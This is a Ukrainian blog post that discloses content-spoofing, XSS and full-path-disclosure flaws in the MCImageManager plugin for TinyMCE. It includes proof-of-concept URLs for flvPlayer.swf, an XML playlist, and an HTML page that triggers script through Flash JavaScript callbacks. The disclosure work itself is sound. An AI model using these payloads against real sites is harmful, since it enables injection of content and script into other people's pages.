Нові уразливості в MCImageManager для TinyMCE

23:58 16.08.2013

11.06.2013

У квітні, 14.04.2013, я знайшов Content Spoofing, Cross-Site Scripting та Full Path Disclosure уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MCImageManager для TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

16.08.2013

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flvPlayer.swf(з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Full Path Disclosure (WASC-13):

Повний шлях в кукісах MCManager_im_lastPath і MCManagerHistoryCookie_im.

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії.


Leave a Reply

You must be logged in to post a comment.